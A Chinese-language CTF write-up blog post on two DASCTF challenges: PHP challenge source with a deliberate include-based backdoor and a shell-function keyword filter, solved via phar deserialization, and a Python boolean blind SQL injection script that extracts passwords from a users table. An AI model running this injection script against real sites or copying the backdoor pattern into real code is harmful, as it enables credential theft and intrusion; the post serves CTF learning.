书接上会,DASCTF 由于我那天蹲 24h 麦当劳睡了一个晚上,到了酒店继续睡了一个下午,导致看到这题的时候已经只剩下一小时了。最后比赛结束后一个多小时才解出来,不过博客还是要有的。
Ez to getflag
这题第一眼看,任意文件读,然后获取源码 Getshell。
其实呢,直接/flag
从原题思路的角度来说,我们先读取file.php<code>和</code>upload.php
//file.php show(); ?>
///upload.php uploadfile(); ?>
里面嵌套了一个class.php
//class.php f = $_FILES; } function savefile() { $fname = md5($this->f["file"]["name"]).".png"; if(file_exists('./upload/'.$fname)) { @unlink('./upload/'.$fname); } move_uploaded_file($this->f["file"]["tmp_name"],"upload/" . $fname); echo "upload success! :D"; } function __toString(){ $cont = $this->fname; $size = $this->fsize; echo $cont->$size; return 'this_is_upload'; } function uploadfile() { if($this->file_check()) { $this->savefile(); } } function file_check() { $allowed_types = array("png"); $temp = explode(".",$this->f["file"]["name"]); $extension = end($temp); if(empty($extension)) { echo "what are you uploaded? :0"; return false; } else{ if(in_array($extension,$allowed_types)) { $filter = '/<\?php|php|exec|passthru|popen|proc_open|shell_exec|system|phpinfo|assert|chroot|getcwd|scandir|delete|rmdir|rename|chgrp|chmod|chown|copy|mkdir|file|file_get_contents|fputs|fwrite|dir/i'; $f = file_get_contents($this->f["file"]["tmp_name"]); if(preg_match_all($filter,$f)){ echo 'what are you doing!! :C'; return false; } return true; } else { echo 'png onlyyy! XP'; return false; } } } } class Show{ public $source; public function __construct($fname) { $this->source = $fname; } public function show() { if(preg_match('/http|https|file:|php:|gopher|dict|\.\./i',$this->source)) { die('illegal fname :P'); } else { echo file_get_contents($this->source); $src = "data:jpg;base64,".base64_encode(file_get_contents($this->source)); echo "
"; } } function __get($name) { $this->ok($name); } public function __call($name, $arguments) { if(end($arguments)=='phpinfo'){ phpinfo(); }else{ $this->backdoor(end($arguments)); } return $name; } public function backdoor($door){ include($door); echo "hacked!!"; } public function __wakeup() { if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) { die("illegal fname XD"); } } } class Test{ public $str; public function __construct(){ $this->str="It's works"; } public function __destruct() { echo $this->str; } } ?>
发现 ban 了 gopher 协议,那就直接 phar 反序列化直接做就好
绝对防御
这题其实可以自己找网页的接口,不过在这么一个静态网页里面找出来还是有点难,至少我找了好久才找到。
最后被人安利了一个这样的插件
一下子就找到了,真的舒服,然后就是正常的联合盲注,注表名,注数据了。
发现自己以前写的盲注脚本好丑,抄一个好看的上来。
import string import requests url = 'http:///SUPPERAPI.php?id=' char = string.ascii_lowercase + string.ascii_uppercase + string.digits + "{}-_~!," digit = string.digits flag = "" for i in range(1,100): for j in range(32,128): print(j) payload = f"ascii(substr((select group_concat(password) from users), {i}, 1))='{j}'" data = f"0||{payload}" res = requests.get(url + data) if "admin" in res.text: flag += chr(j) print("flag:" + flag) break
